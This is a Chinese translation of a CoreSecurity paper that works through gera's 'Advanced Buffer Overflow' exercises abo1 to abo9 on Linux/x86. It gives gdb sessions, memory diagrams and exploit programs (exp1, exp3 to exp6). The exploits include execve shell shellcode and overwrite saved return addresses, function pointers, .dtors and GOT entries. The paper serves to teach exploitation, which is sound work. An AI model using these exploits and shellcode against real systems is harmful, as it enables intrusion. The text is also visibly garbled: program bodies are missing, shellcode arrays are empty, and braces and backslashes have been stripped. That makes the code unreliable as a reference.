

文章来源: http://packetstormsecurity.nl/papers/general/core_vulnerabilities.pdf
文章提交: Ph4nt0m (axis_at_ph4nt0m.net)

版权所有: http://www.code-sec.com
翻译+整理 By 刺(ph4nt0m),cloie
来源:幻影旅团翻译组 http://www.3389.net/bbs

译者注:本文是alert7所翻译的《非安全编程演示之高级篇》的更新版本,加入了作者的很多分析。原作者为coresecurity team。我们尽可能翻译出作者的原意,不足或错误之处还请高手指点。在翻译过程中,感谢水木的hellguard,绿盟的warning3,以及好友d0nNy等的指导。



CoreSecurity将在本文中,分析程序员在使用C编程过程中一些比较常见的错误。要讨论的就是高级缓存溢出(ABO),以十个具体例子说明(作者gera)。我们将指出这些程序中薄弱点的细节,为什么这些错误是危险的,并提供相应的exploit。所有测试均是在Linux Slackware 8.0 server(IA32),GNU GCC 2.95.3环境下。
可以从 www.core-sec.com得到本文的升级,任何疑问请与我们联系:info@core-sec.com

/*abo1.c                                                 *
* specially crafted to feed your brain by gera@core-sdi.com */
/* Dumb example to let you get introduced…                  */

int main(int argv,char **argc)
char buf[256];

user@CoreLabs:~/gera$ gcc abo1.c –o abo1 -ggdb
user@CoreLabs:~/gera$ gdb ./abo1
GNU gdb 5.0
This GDB was configured as “i386-slackware-linux”…
(gdb) r `perl –e ‘printf  “A” x 264’`
Starting program: /home/user/gera/abo1 `perl –e ‘printf “A” x 264’`
Program received signal SIGSEGV,Segmentation fault.
0x41414141 in ?? ()
(gdb)  i  r
eax        0xbffff7ec        - 1073743892
ecx        0xfffffd7c        - 644
edx        0xbffffb78        - 1073742984
ebx        0x4012ba58          1074969176
esp        0xbffff8f4          0xbffff8f4
ebp        0x41414141          0x41414141
esi        0x40015d64          1073831268
edi        0xbffff954        - 1073743532
eip        0x41414141          0x41414141
eflags     0x10286     66182
(gdb) bt
# 0     0x41414141 in ?? ()
Cannot access memory at address 0x41414141
  ( gdb) q
The program is running.     Exit anyway? ( y or n) y
user@ CoreLabs:~/ gera$

当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.
    0xbfffffff ---> +--------------------------------------+
                    |              四个空字节              |
    0xbfffffff ---> +--------------------------------------+
                    |                程序名                |
                    |              shellcode               |
shellcode的地址---> +--------------------------------------+ <---
                    |  SHELL的环境变量和命令行参数保存区   |     |
                    +--------------------------------------+     |
       四个字节---> |                返回地址              | ----
       四个字节---> |               保存的ESP              |
            |       |                Buf[256]              |  /|/
            |       |                                      |   |
            |       |                AAAAAAAA              |   |
栈增长方向 |       |                AAAAAAAA              |   |缓存区溢出方向
            |       |                AAAAAAAA              |   |
            |       |                AAAAAAAA              |   |
            |       |                AAAAAAAA              |   |
           /|/      +--------------------------------------+
                    |                                      |



** exp1. c
** Coded by CoreSecurity ¨C info@ core- sec. com
# include < string. h>
# include < unistd. h>
# define BUFSIZE 264 + 1
/* 24 bytes shellcode */
char shellcode[]=              "x31xc0x50x68x2fx2fx73x68x68x2fx62x69"                  "x6ex89xe3x50x53x89xe1x99xb0x0bxcdx80";
int   main( void) {
         char * env[ 3] =  {shellcode, NULL};
         char evil_ buffer[ BUFSIZE];
         char * p;
         /* Calculating address of shellcode */
int ret=0xbffffffa-strlen( shellcode)-strlen("/ home/ user/ gera/ abo1");
                /* Constructing the buffer */
                p = evil_ buffer;
                memset( p, ' A', 260);  // Some junk
                p += 260;
                *(( void **) p) = ( void *) ( ret);
                p += 4;
                * p= '0';
execle("/ home/ user/ gera/ abo1", " abo1", evil_ buffer, NULL, env);

/* abo2. c                                                      *                                            
* specially crafted to feed your brain by gera@core-sdi.com */

/* This is a tricky example to make you think                   *            
* and give you some help on the next one                       */

int main( int argv, char ** argc)
                char buf[256];



user@ CoreLabs:~/ gera$ gcc abo2. c - o abo2 - ggdb
user@ CoreLabs:~/ gera$ gdb ./ abo2
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB   is   free   software,   covered   by   the   GNU   General   Public   License,   and   you
are    welcome    to    change    it    and/ or    distribute    copies    of    it    under    certain
Type " show copying" to see the conditions.
There is absolutely no warranty for GDB.     Type " show warranty" for details.
This GDB was configured as " i386- slackware- linux"...
( gdb) r ` perl - e ' printf " A" x 264'`
Starting program: / home/ user/ gera/ abo2 ` perl - e ' printf " A" x 264'`

Program exited with code 01.
( gdb) disass main
Dump of assembler code for function main:
0x8048430 < main>:               push       % ebp
0x8048431 < main+ 1>:           mov         % esp,% ebp
0x8048433 < main+ 3>:           sub         $ 0x108,% esp
0x8048439 < main+ 9>:           add         $ 0xfffffff8,% esp
0x804843c < main+ 12>:         mov         0xc(% ebp),% eax
0x804843f < main+ 15>:         add         $ 0x4,% eax
0x8048442 < main+ 18>:         mov         (% eax),% edx
0x8048444 < main+ 20>:         push       % edx
0x8048445 < main+ 21>:         lea         0xffffff00(% ebp),% eax
0x804844b < main+ 27>:         push       % eax
0x804844c < main+ 28>:         call       0x8048334 < strcpy>
0x8048451 < main+ 33>:         add         $ 0x10,% esp
0x8048454 < main+ 36>:         add         $ 0xfffffff4,% esp
0x8048457 < main+ 39>:         push       $ 0x1
0x8048459 < main+ 41>:         call       0x8048324 < exit>
0x804845e < main+ 46>:         add         $ 0x10,% esp
0x8048461 < main+ 49>:         leave
0x8048462 < main+ 50>:         ret
End of assembler dump.
( gdb) q


/* abo3. c                                                      *
* specially crafted to feed your brain by gera@core-sdi.com */

/* This'll prepare you for The Next Step */

int main(int argv, char ** argc)
                extern system, puts;
                void (* fn)(char*)=(void(*)(char*))& system;
                char buf[256];

                fn=(void(*)(char*))& puts;


user@ CoreLabs:~/ gera$ gcc abo3. c - o abo3 - ggdb
user@ CoreLabs:~/ gera$ gdb ./ abo3
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB   is   free   software,   covered   by   the   GNU   General   Public   License,   and   you
arewelcome    to    change    it    and/ or    distribute    copies    of    it    under    certain
Type " show copying" to see the conditions.
There is absolutely no warranty for GDB.     Type " show warranty" for details.
This GDB was configured as " i386- slackware- linux"...
( gdb) r ` perl - e ' printf " B" x 260'` A
Starting program: / home/ user/ gera/ abo3 ` perl - e ' printf " B" x 260'` A

Program received signal SIGSEGV, Segmentation fault.
0x42424242 in ?? ()
( gdb) disass main
Dump of assembler code for function main:
0x8048490 < main>:               push       % ebp
0x8048491 < main+ 1>:           mov         % esp,% ebp
0x8048493 < main+ 3>:           sub         $ 0x114,% esp
0x8048499 < main+ 9>:           push       % ebx
0x804849a < main+ 10>:         movl       $ 0x804834c, 0xfffffffc(% ebp)
0x80484a1 < main+ 17>:         movl       $ 0x804835c, 0xfffffffc(% ebp)
0x80484a8 < main+ 24>:         add         $ 0xfffffff8,% esp
0x80484ab < main+ 27>:         mov         0xc(% ebp),% eax
0x80484ae < main+ 30>:         add         $ 0x4,% eax
0x80484b1 < main+ 33>:         mov         (% eax),% edx
0x80484b3 < main+ 35>:         push       % edx
0x80484b4 < main+ 36>:         lea         0xfffffefc(% ebp),% eax
0x80484ba < main+ 42>:         push       % eax
0x80484bb < main+ 43>:         call       0x804839c < strcpy>

0x80484c0 < main+ 48>:         add         $ 0x10,% esp
0x80484c3 < main+ 51>:         add         $ 0xfffffff4,% esp
0x80484c6 < main+ 54>:         mov         0xc(% ebp),% eax
0x80484c9 < main+ 57>:         add         $ 0x8,% eax
0x80484cc < main+ 60>:         mov         (% eax),% edx
0x80484ce < main+ 62>:         push       % edx
0x80484cf < main+ 63>:         mov         0xfffffffc(% ebp),% ebx
0x80484d2 < main+ 66>:         call       *% ebx
0x80484d4 < main+ 68>:         add         $ 0x10,% esp
0x80484d7 < main+ 71>:         add         $ 0xfffffff4,% esp
0x80484da < main+ 74>:         push       $ 0x1
0x80484dc < main+ 76>:         call       0x804838c < exit>
0x80484e1 < main+ 81>:         add         $ 0x10,% esp
0x80484e4 < main+ 84>:         mov         0xfffffee8(% ebp),% ebx
0x80484ea < main+ 90>:         leave
0x80484eb < main+ 91>:         ret
End of assembler dump.
( gdb) q
The program is running.     Exit anyway? ( y or n) y
user@ CoreLabs:~/ gera$

当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.

                    |                                      |
       四个字节---> |              fn()函数地址            |
            |       |                Buf[256]              |  /|/
            |       |                                      |   |
            |       |                BBBBBBBB              |   |
栈增长方向 |       |                BBBBBBBB              |   |缓存区溢出方向
            |       |                BBBBBBBB              |   |
            |       |                BBBBBBBB              |   |
           /|/      +--------------------------------------+
                    |                                      |

为了成功地exploit这个程序,我们必须不让系统调用在0x080484dc 的exit(),可以从abo2中得到这个教训!因为函数fn()被压入栈中的0x080484a1,刚好在Buf[256]前面,它可以被覆盖并在0x080484d2运行,在系统调用exit()前。

** exp3. c
** Coded by CoreSecurity-info@core-sec.com

# include <string.h>
# include <unistd.h>

# define BUFSIZE 261

/* 24 bytes shellcode */
char shellcode[]=
int    main(void) {
                char * env[3]=shellcode, NULL;
                char evil_buffer[BUFSIZE];
                char * p;

                /* Calculating address of shellcode */
                int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo3");

                /* Constructing the buffer */
                p = evil_buffer;
                memset( p,'B',256);         // Some junk
                p += 256;

                *((void **)p)=(void *)(ret);
                p +=4;
                * p='0';

                /* Two arguments are passed to vulnerable program */
                execle("/home/user/gera/abo3","abo3", evil_buffer,"A",NULL,env);

/* abo4. c                                                      *
* specially crafted to feed your brain by gera@core-sdi.com */

/* After this one, the next is just an Eureka! away             */

extern system, puts;
void (* fn)( char*)=( void(*)( char*))& system;

int main( int argv, char ** argc)
                char * pbuf= malloc(strlen(argc[2])+1);
                char buf[256];

                fn=(void(*)(char*))& puts;


user@ CoreLabs:~/ gera$ gcc abo4. c - o abo4 - ggdb
abo4. c: In function ` main':
abo4. c: 10:    warning:    initialization    makes    pointer    from    integer    without    a
user@ CoreLabs:~/ gera$ gdb ./ abo4
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB   is   free   software,   covered   by   the   GNU   General   Public   License,   and   you
arewelcome    to    change    it    and/ or    distribute    copies    of    it    under    certain
Type " show copying" to see the conditions.
There is absolutely no warranty for GDB.     Type " show warranty" for details.
This GDB was configured as " i386- slackware- linux"...
( gdb) r ` perl - e ' printf " A" x 260'` BBBB CCCC
Starting program: / home/ user/ gera/ abo4 ` perl - e ' printf " A" x 260'` BB CC

Program received signal SIGSEGV, Segmentation fault.
strcpy   ( dest= 0x41414141   < Address   0x41414141   out   of   bounds>, src= 0xbffffb6e
" BBBB") at ../ sysdeps/ generic/ strcpy. c: 40
40             ../ sysdeps/ generic/ strcpy. c: No such file or directory.
( gdb) disass main
Dump of assembler code for function main:
0x80484d0 < main>:               push       % ebp
0x80484d1 < main+ 1>:           mov         % esp,% ebp
0x80484d3 < main+ 3>:           sub         $ 0x114,% esp
0x80484d9 < main+ 9>:           push       % ebx
0x80484da < main+ 10>:         add         $ 0xfffffff4,% esp
0x80484dd < main+ 13>:         add         $ 0xfffffff4,% esp

0x80484e0 < main+ 16>:         mov         0xc(% ebp),% eax
0x80484e3 < main+ 19>:         add         $ 0x8,% eax
0x80484e6 < main+ 22>:         mov         (% eax),% edx
0x80484e8 < main+ 24>:         push       % edx
0x80484e9 < main+ 25>:         call       0x80483b4 < strlen>
0x80484ee < main+ 30>:         add         $ 0x10,% esp
0x80484f1 < main+ 33>:         mov         % eax,% eax
0x80484f3 < main+ 35>:         lea         0x1(% eax),% edx
0x80484f6 < main+ 38>:         push       % edx
0x80484f7 < main+ 39>:         call       0x8048394 < malloc>
0x80484fc < main+ 44>:         add         $ 0x10,% esp
0x80484ff < main+ 47>:         mov         % eax,% eax
0x8048501 < main+ 49>:         mov         % eax, 0xfffffffc(% ebp)
0x8048504 < main+ 52>:         movl       $ 0x8048384,0x80495cc
0x804850e < main+ 62>:         add         $ 0xfffffff8,% esp
0x8048511 < main+ 65>:         mov         0xc(% ebp),% eax
0x8048514 < main+ 68>:         add         $ 0x4,% eax
0x8048517 < main+ 71>:         mov         (% eax),% edx
0x8048519 < main+ 73>:         push       % edx
0x804851a < main+ 74>:         lea         0xfffffefc(% ebp),% eax
0x8048520 < main+ 80>:         push       % eax
0x8048521 < main+ 81>:         call       0x80483d4 < strcpy>
0x8048526 < main+ 86>:         add         $ 0x10,% esp
0x8048529 < main+ 89>:         add         $ 0xfffffff8,% esp
0x804852c < main+ 92>:         mov         0xc(% ebp),% eax
0x804852f < main+ 95>:         add         $ 0x8,% eax
0x8048532 < main+ 98>:         mov         (% eax),% edx
0x8048534 < main+ 100>:       push       % edx
0x8048535 < main+ 101>:       mov         0xfffffffc(% ebp),% eax
0x8048538 < main+ 104>:       push       % eax
0x8048539 < main+ 105>:       call       0x80483d4 < strcpy>
0x804853e < main+ 110>:       add         $ 0x10,% esp
0x8048541 < main+ 113>:       add         $ 0xfffffff4,% esp
0x8048544 < main+ 116>:       mov         0xc(% ebp),% eax
0x8048547 < main+ 119>:       add         $ 0xc,% eax
0x804854a < main+ 122>:       mov         (% eax),% edx
0x804854c < main+ 124>:       push       % edx
0x804854d < main+ 125>:       mov         0x80495cc,% ebx
0x8048553 < main+ 131>:       call       *% ebx
0x8048555 < main+ 133>:       add         $ 0x10,% esp
0x8048558 < main+ 136>:       jmp         0x8048560 < main+ 144>
0x804855a < main+ 138>:       jmp         0x8048562 < main+ 146>
0x804855c < main+ 140>:       lea         0x0(% esi, 1),% esi
0x8048560 < main+ 144>:       jmp         0x8048558 < main+ 136>
0x8048562 < main+ 146>:       mov         0xfffffee8(% ebp),% ebx
0x8048568 < main+ 152>:       leave
0x8048569 < main+ 153>:       ret
End of assembler dump.
( gdb) main inf sec
Exec file: `/ home/ user/ gera/ abo4', file type elf32- i386.
[ Some part of output was removed. It?ˉs not needed anyway]
            0x080482e4-> 0x080482ec at 0x000002e4: . rel. dyn
            0x080482ec-> 0x0804832c at 0x000002ec: . rel. plt
            0x0804832c-> 0x08048351 at 0x0000032c: . init
            0x08048354-> 0x080483e4 at 0x00000354: . plt
            0x080483f0-> 0x0804859c at 0x000003f0: . text
            0x0804859c-> 0x080485b8 at 0x0000059c: . fini

            0x080485b8-> 0x080485c0 at 0x000005b8: . rodata
            0x080495c0-> 0x080495d0 at 0x000005c0: . data
            0x080495d0-> 0x08049618 at 0x000005d0: . eh_ frame
            0x08049618-> 0x080496e0 at 0x00000618: . dynamic
            0x080496e0-> 0x080496e8 at 0x000006e0: . ctors
            0x080496e8-> 0x080496f0 at 0x000006e8: . dtors
            0x080496f0-> 0x08049720 at 0x000006f0: . got
            0x08049720-> 0x08049738 at 0x00000720: . bss
[ Some part of output was removed. It?ˉs not needed anyway]
( gdb) x/ x 0x080495cc
0x80495cc < force_ to_ data>:             0x08048384
( gdb) x/ x 0x08048384
0x8048384 < puts>:               0x970425ff
( gdb)
0x8048388 < puts+ 4>:           0x10680804
( gdb)
0x804838c < puts+ 8>:           0xe9000000
( gdb) q
The program is running.     Exit anyway? ( y or n) y
user@ CoreLabs:~/ gera$

当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.

    0xbfffffff ---> +--------------------------------------+
                    |                                      |
                    +--------------------------------------+ <--
                    |              shellcode               |    |
                    +--------------------------------------+    |
                    |                                      |    |
                    +--------------------------------------+    |
                --- |              pbuf 的地址             |    |
               |    +--------------------------------------+    |
               |    |                Buf[256]              |    |
               |    |                                      |    |
               |    |                AAAAAAAA              |    |
               |    |                AAAAAAAA              |    |
栈(stack)      |    +--------------------------------------+    |
增长方向       |    |                                      |    |
               |                                                |
               |                                                |
               |    |                                      |    |
               |    +--------------------------------------+    |
               |    |                 fu()                 |    |
                --->+--------------------------------------+ ---
                    |                                      |
                /|/ +--------------------------------------+
                 |  |                .fini                 |
                 |  +--------------------------------------+
堆(heap)增长方向 |  |                .text                 |
                 |  +--------------------------------------+
                 |  |                .plt                  |
                 |  +--------------------------------------+
                    |                                      |
     0x08000000---> +--------------------------------------+


** exp4. c
** Coded by CoreSecurity-info@core-sec.com

# include <string.h>
# include <unistd.h>

# define BUFSIZE1         261
# define BUFSIZE2         5
# define FN_ADDRESS     0x080495cc         /* Address of fn() */

/* 24 bytes shellcode */
char shellcode[]=

int     main(void) {

                char evil_buffer1[BUFSIZE1];
                char evil_buffer2[BUFSIZE2];
                char * env[3]=shellcode,NULL;
                char * p;

                /* Calculating address of shellcode */
                int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo4");

                /* Constructing first buffer */
                memset(p,'A',256);         // Some junk
                p +=256;

                *((void **)p) = (void *) (FN_ADDRESS);
                p +=4;
                * p ='0';

                /* Constructing second buffer */
                *((void **)p)=(void *)(ret);
                p += 4;
                * p ='0';



/* abo5. c                                                   *
* specially crafted to feed your brain by gera@core-sdi.com */

/* You take the blue pill, you wake up in your bed,          *
* and you believe what you want to believe                  *
* You take the red pill,                                    *
* and I'll show you how deep goes the rabbit hole           */

int main( int argv, char ** argc){
                char * pbuf=malloc(strlen(argc[2])+1);
                char buf[256];

                for (;* pbuf++=*(argc[2]++););

    一个260字节可以覆盖  * pbuf,因此攻击者可以两个参数的strcpy()了。但是再覆盖什么呢?这个程序不像先前的那些有内部函数。可能的地址有三个:.dtors区地址,GOT(Global Offset Table,全局偏移表)里exit()的地址,GOT里__ deregister_ frame_ info的地址。三个都可以,GOT里的地址可以这样看:

user@ CoreLabs:~/ gera$ objdump - R ./ abo5

./ abo5:           file format elf32- i386

OFFSET       TYPE                             VALUE
080496c4 R_ 386_ GLOB_ DAT         __ gmon_ start__
080496a8 R_ 386_ JUMP_ SLOT       __ register_ frame_ info
080496ac R_ 386_ JUMP_ SLOT       malloc
080496b0 R_ 386_ JUMP_ SLOT       __ deregister_ frame_ info
080496b4 R_ 386_ JUMP_ SLOT       strlen
080496b8 R_ 386_ JUMP_ SLOT       __ libc_ start_ main
080496bc R_ 386_ JUMP_ SLOT       exit
080496c0 R_ 386_ JUMP_ SLOT       strcpy

user@ CoreLabs:~/ gera$

Address of . dtors sections that can be overwritten is:

user@ CoreLabs:~/ gera$ gdb ./ abo5
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.

GDB   is   free   software,   covered   by   the   GNU   General   Public   License,   and   you
are    welcome    to    change    it    and/ or    distribute    copies    of    it    under    certain
Type " show copying" to see the conditions.
There is absolutely no warranty for GDB.     Type " show warranty" for details.
This GDB was configured as " i386- slackware- linux"...
( gdb) main inf sec
Exec file: `/ home/ user/ gera/ abo5', file type elf32- i386.
[ Some part of output was removed. It?ˉs not needed anyway]
            0x08048308-> 0x0804832d at 0x00000308: . init
            0x08048330-> 0x080483b0 at 0x00000330: . plt
            0x080483b0-> 0x0804854c at 0x000003b0: . text
            0x0804854c-> 0x08048568 at 0x0000054c: . fini
            0x08048568-> 0x08048570 at 0x00000568: . rodata
            0x08049570-> 0x0804957c at 0x00000570: . data
            0x0804957c-> 0x080495c4 at 0x0000057c: . eh_ frame
            0x080495c4-> 0x0804968c at 0x000005c4: . dynamic
            0x0804968c-> 0x08049694 at 0x0000068c: . ctors
            0x08049694-> 0x0804969c at 0x00000694: . dtors
            0x0804969c-> 0x080496c8 at 0x0000069c: . got
            0x080496c8-> 0x080496e0 at 0x000006c8: . bss
[ Some part of output was removed. It?ˉs not needed anyway]
( gdb) x/ x 0x08049694
0x8049694 <__ DTOR_ LIST__>:             0xffffffff
( gdb)
0x8049698 <__ DTOR_ END__>:               0x00000000
( gdb)
0x804969c <_ GLOBAL_ OFFSET_ TABLE_>:             0x080495c4
( gdb)
0x80496a0 <_ GLOBAL_ OFFSET_ TABLE_+ 4>:         0x0000000
( gdb) q
user@ CoreLabs:~/ gera$


** exp5. c
** Coded by CoreSecurity-info@core-sec.com

# include <string.h>
# include <unistd.h>

# define BUFSIZE1         261
# define BUFSIZE2         5
# define DTORS_ADDRESS     0x08049698       /* Address of . dtors section */
//# define DEREG_FRAME         0x080496b0   /* Address of __ deregister_ frame_ info
in GOT */
//# define EXIT_ADDRESS       0x080496bc    /* Address of exit() entry in GOT */

/* 24 bytes shellcode */
char shellcode[]=
int     main( void)
                char evil_buffer1[BUFSIZE1];
                char evil_buffer2[BUFSIZE2];
                char * env[3]=shellcode,NULL;
                char * p;
                /* Calculating address of shellcode */
                int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo5");
                /* Constructing first buffer */
                memset(p,'A',256);         // Some junk
                p +=256;
                *((void **)p)=(void *)(DTORS_ADDRESS);
                p +=4;
                * p ='0';
                /* Constructing second buffer */
                *((void **)p)=(void *)(ret);
                p +=4;
                * p ='0';


/* abo6.c                                                       *
* specially crafted to feed your brain by gera@core-sdi.com    */

/* return to me my love                                         */

int main(int argv, char ** argc) {
                char * pbuf=malloc(strlen(argc[2])+ 1);
                char buf[256];


当程序被操作系统调入内存运行, 其相对应的进程在内存中的影像如下图所示.

        |             ......                   |  ... 省略了一些我们不需要关心的区
        +--------------------------------------+ <--
        |            Shellcode                 |    |
        +--------------------------------------+    |
        |                             |    |
        |            Some data                 |    |        
        |                                      |    |
        +--------------------------------------+    |
     -- |           addr. of pbuf              |    |
    |   +--------------------------------------+    |
    |   |             buf[256]                 |    |
    |   |                                      |    |  
    |   |             AAAAAAAA                 |    | /|/
    |   |             AAAAAAAA                 |    |  |
    |   |                                      |    |  |  
    |   +--------------------------------------+    |  |(缓存区溢出方向)
    |   |                                      |    |  |
    |   |            Some data                 |    |  |
    |   |                                      |    |  |
    |   +--------------------------------------+    |
    |   |           Return Address             | ---    
    |   +--------------------------------------+                      
    |   |           Saved  Address             |  
    |   +--------------------------------------+  
    |   |                                      |
     -->|                                      |
        |                                      |


        |             ......                   |  ... 省略了一些我们不需要关心的区
        |  env strings (环境变量字串)          | /
        +--------------------------------------+  /
        |  argv strings (命令行字串)           |   /
        +--------------------------------------+    /
        |  env pointers (环境变量指针)         |    SHELL的环境变量和命令行参数保存区
        +--------------------------------------+    /
        |  argv pointers (命令行参数指针)      |   /
        +--------------------------------------+  /
        |  argc (命令行参数个数)               | /
        |            main 函数的栈帧           | /
        +--------------------------------------+  /
        |            func_1 函数的栈帧         |   /
        +--------------------------------------+    /
        |            func_2 函数的栈帧         |     /
        +--------------------------------------+      /
        |            func_3 函数的栈帧         |      Stack (栈)
        +......................................+      /
        |                                      |     /
                      ......                        /
        |                                      |   /
        +......................................+  /
        |            Heap (堆)                 | /
        |        Uninitialised (BSS) data      |  非初始化数据(BSS)区
        |        Initialised data              |  初始化数据区
        |        Text                          |  文本区


注意接下来的这个exploit也许需要修改(offset和Return Address).
** exp6.  
** Coded by CoreSecurity-info@core-sec.com

# include <string.h>
# include <unistd.h>

# define BUFSIZE1         261
# define BUFSIZE2         60                             /* Offcet */
# define RETURN_ADDRESS     0xbffffc5c

/* 24 bytes shellcode */
char shellcode[]=

int     main(void) {

                char evil_buffer1[BUFSIZE1];
                char evil_buffer2[BUFSIZE2];
                char * env[3]={shellcode,NULL};
                char * p;
                int i=0;

                /* Calculating address of shellcode */
                int ret=0xbffffffa-strlen(shellcode)-strlen("/home/user/gera/abo6");

                /* Constructing first buffer */
                memset(p,'A',256);         // Some junk
                p +=256;

                *((void **)p) = (void *) (RETURN_ADDRESS);
                p += 4;
                * p ='0';

                /* Constructing second buffer */

                p =evil_buffer2;

                for(i=0;i<BUFSIZE2/4;i++) {
                                *((void **) p) = (void *) (ret);
                                p += 4;
                * p ='0';

               execle("/home/user/gera/abo6","abo6",evil_buffer1,evil_buffer2,NULL, env);

/* abo7. c                                                      *
* specially crafted to feed your brain by gera@ core- sdi. com */

/* sometimes you can,           *
* sometimes you don't          *
* that's what life's about     */

char buf[256]={1};

int main(int argv, char ** argc) {
                strcpy(buf, argc[1]);

    这是一个heap overflow和覆盖.dtors区的典范.然而,却因为编译器的版本而不能成功溢出.debugging的结果是这样的:

user@ CoreLabs:~/ gera$ gcc abo7. c - o abo7 - ggdb
user@ CoreLabs:~/ gera$ gdb ./ abo7
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB   is   free   software,   covered   by   the   GNU   General   Public   License,   and   you
are    welcome    to    change    it    and/ or    distribute    copies    of    it    under    certain
Type " show copying" to see the conditions.
There is absolutely no warranty for GDB.     Type " show warranty" for details.
This GDB was configured as " i386- slackware- linux"...
( gdb) main inf sec
Exec file: `/ home/ user/ gera/ abo7', file type elf32- i386.
[ Some part of output was removed. It??s not needed anyway]
            0x08048298-> 0x080482bd at 0x00000298: . init
            0x080482c0-> 0x08048310 at 0x000002c0: . plt
            0x08048310-> 0x0804843c at 0x00000310: . text
            0x0804843c-> 0x08048458 at 0x0000043c: . fini
            0x08048458-> 0x08048460 at 0x00000458: . rodata
            0x08049460-> 0x08049580 at 0x00000460: . data
            0x08049580-> 0x080495c0 at 0x00000580: . eh_ frame
            0x080495c0-> 0x08049688 at 0x000005c0: . dynamic
            0x08049688-> 0x08049690 at 0x00000688: . ctors
            0x08049690-> 0x08049698 at 0x00000690: . dtors
            0x08049698-> 0x080496b8 at 0x00000698: . got
            0x080496b8-> 0x080496d0 at 0x000006b8: . bss
[ Some part of output was removed. It’s not needed anyway]
( gdb) q
user@ CoreLabs:~/ gera$

            0x08048f88-> 0x08048fad at 0x00000f88: . init
            0x08048fb0-> 0x08049420 at 0x00000fb0: . plt
            0x08049420-> 0x0804f45c at 0x00001420: . text
            0x0804f45c-> 0x0804f478 at 0x0000745c: . fini
            0x0804f480-> 0x080523bc at 0x00007480: . rodata
            0x080533bc-> 0x08053478 at 0x0000a3bc: . data
            0x08053478-> 0x0805347c at 0x0000a478: . eh_ frame
            0x0805347c-> 0x08053484 at 0x0000a47c: . ctors
            0x08053484-> 0x0805348c at 0x0000a484: . dtors
            0x0805348c-> 0x080535b8 at 0x0000a48c: . got
            0x080535b8-> 0x08053660 at 0x0000a5b8: . dynamic
            0x08053660-> 0x08053660 at 0x0000a660: . sbss
            0x08053660-> 0x08053908 at 0x0000a660: . bss

/* abo8. c                                                      *
* specially crafted to feed your brain by gera@ core- sdi. com */

/* spot the difference */

char buf[256];

int main(int argv, char ** argc){

user@ CoreLabs:~/ gera$ gcc abo8. c - o abo8 - ggdb
user@ CoreLabs:~/ gera$ gdb ./ abo8
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB   is   free   software,   covered   by   the   GNU   General   Public   License,   and   you
are    welcome    to    change    it    and/ or    distribute    copies    of    it    under    certain
Type " show copying" to see the conditions.
There is absolutely no warranty for GDB.     Type " show warranty" for details.
This GDB was configured as " i386- slackware- linux"...
( gdb) main inf sec
Exec file: `/ home/ user/ gera/ abo8', file type elf32- i386.
[ Some part of output was removed. It??s not needed anyway]
            0x08048298-> 0x080482bd at 0x00000298: . init
            0x080482c0-> 0x08048310 at 0x000002c0: . plt
            0x08048310-> 0x0804843c at 0x00000310: . text
            0x0804843c-> 0x08048458 at 0x0000043c: . fini
            0x08048458-> 0x08048460 at 0x00000458: . rodata
            0x08049460-> 0x0804946c at 0x00000460: . data
            0x0804946c-> 0x080494ac at 0x0000046c: . eh_ frame
            0x080494ac-> 0x08049574 at 0x000004ac: . dynamic
            0x08049574-> 0x0804957c at 0x00000574: . ctors
            0x0804957c-> 0x08049584 at 0x0000057c: . dtors
            0x08049584-> 0x080495a4 at 0x00000584: . got
            0x080495c0-> 0x080496e0 at 0x000005c0: . bss
( gdb) q
user@ CoreLabs:~/ gera$


/* abo9. c                                                      *
* specially crafted to feed your brain by gera@ core- sdi. com */

/* modified by CoreSecurity */

/* free( your mind)                                             */
/* I'm not sure in what operating systems it can be done        */

int main(int argv, char ** argc){
                char * pbuf1=(char*)malloc(256);
                char * pbuf2=(char*)malloc(256);

//              gets(pbuf1);

    上面这段代码很容易溢出.在这里是strcpy()函数,而不是gets().当执行free(pbuf2)时将会发生segment fault,因为strcpy()覆盖了第二个内存块的管理信息(头部). CORESECURITY将不会在这份文档中详细叙述 Doug Lea’s Malloc.
user@ CoreLabs:~/ gera$ gcc abo9. c - o abo9 - ggdb
user@ CoreLabs:~/ gera$ ltrace ./ abo9
__ libc_ start_ main( 0x08048454,       1,       0xbffffa34,       0x080482e0,       0x080484ec
< unfinished ...>
__ register_ frame_ info( 0x0804951c,       0x0804965c,       0xbffff9d8,       0x4004f138,
0x4012ba58) = 0x4012c740
malloc( 256)                                                           = 0x08049680 <- first chunk ( data)
malloc( 256)                                                           = 0x08049788 <- second chunk ( data)
strcpy( 0x08049680, NULL < unfinished ...>
--- SIGSEGV ( Segmentation fault) ---
+++ killed by SIGSEGV +++
user@ bahur:~/ gera# gdb ./ abo9
GNU gdb 5.0
Copyright 2000 Free Software Foundation, Inc.
GDB   is   free   software,   covered   by   the   GNU   General   Public   License,   and   you
are    welcome    to    change    it    and/ or    distribute    copies    of    it    under    certain
Type " show copying" to see the conditions.
There is absolutely no warranty for GDB.     Type " show warranty" for details.
This GDB was configured as " i386- slackware- linux"...
( gdb) r ` perl - e ' printf " A" x 260'`
Starting program: / home/ user/ gera/ abo9 ` perl - e ' printf " A" x 260'`
Program received signal SIGSEGV, Segmentation fault.
0x40090c18 in chunk_ free ( ar_ ptr= 0x40129cc0, p= 0xc6c3563f) at malloc. c: 3128
3128         malloc. c: No such file or directory.
( gdb) x/ x 0x08049780
0x8049780:             0x41414141         <---- prev_ size field of second chunk
( gdb)
0x8049784:             0x00000100         <---- size             field of second chunk
( gdb)
0x8049788:             0x00000000         <---- data in second chunk begins here
( gdb)
0x804978c:             0x00000000
( gdb) q
The program is running.     Exit anyway? ( y or n)   y
user@ CoreLabs:~/ gera$
